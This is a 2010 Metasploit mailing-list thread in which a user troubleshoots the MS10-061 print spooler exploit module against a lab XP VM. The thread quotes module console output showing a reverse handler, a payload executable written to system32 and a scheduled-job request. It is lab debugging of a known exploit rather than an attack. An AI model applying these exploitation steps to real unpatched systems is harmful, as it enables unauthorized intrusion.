Metasploit mailing list archives
Re: ms10_061_spoolss.rb working for anyone?
From: hacksauce <metasploit () hacksauce com>
Date: Thu, 23 Sep 2010 11:51:29 -0600
On a XP SP3 VM (VMware) I created a printer (there isn't really a printer there) and shared it. When I run the exploit I get : [*] Started reverse handler on 192.168.208.129:31337 [*] Trying target Windows Universal... [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.208.131[\spoolss] ... [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.208.131[\spoolss] ... [*] Attempting to exploit MS10-061 via \\192.168.208.131\HP ... [*] Printer handle: 00000000423833d8963203429ecf5e3f9d1a3e2f [*] Job started: 0x2 [*] Wrote 73802 bytes to %SystemRoot%\system32\2hvWFCf29WnRxV.exe [*] Job started: 0x3 [*] Wrote bind request for \\192.168.208.131\PIPE\ATSVC (72 bytes) [*] Wrote 96 bytes of NetrAddJob request [*] Everything should be set, waiting up to two minutes for a session... [*] Exploit completed, but no session was created. I checked the victim, and 2hvWFCf29WnRxV.exe doesn't exist in the system32 folder. I've attached the output of filemon (filtered on system32) while the exploit is running, and I don't see the exploit exe being created. I've checked at and I'm not seeing a scheduled task at all. 1. Does the printer have to physically exist? I noticed that when I changed the port from lpt to file, I get jobs queued up, that need to be saved... 2. When the exploit succeeds, is there an job left in the scheduled tasks folder? James On Tue, Sep 21, 2010 at 10:23 AM, HD Moore <hdm () metasploit com> wrote:
On 9/21/2010 11:17 AM, Richard Miles wrote:I tested the new ms10_061_spoolss.rb but it's not working agains my unpatched box. Anyone with success? Can you please provide details about target? And details if you used any unusual param on the exploit?If you live someplace with a +GMT time zone, update and try the latest. A bug was fixed that caused the wrong scheduler time to be used. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Attachment:
MS10-061.LOG
Description:
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- ms10_061_spoolss.rb working for anyone? Richard Miles (Sep 21)
- Re: ms10_061_spoolss.rb working for anyone? HD Moore (Sep 21)
- Re: ms10_061_spoolss.rb working for anyone? hacksauce (Sep 23)
- Re: ms10_061_spoolss.rb working for anyone? Joshua J. Drake (Sep 23)
- Adobe adobe_cooltype_sing.rb Jeffs (Sep 26)
- Re: ms10_061_spoolss.rb working for anyone? hacksauce (Sep 23)
- Re: ms10_061_spoolss.rb working for anyone? HD Moore (Sep 21)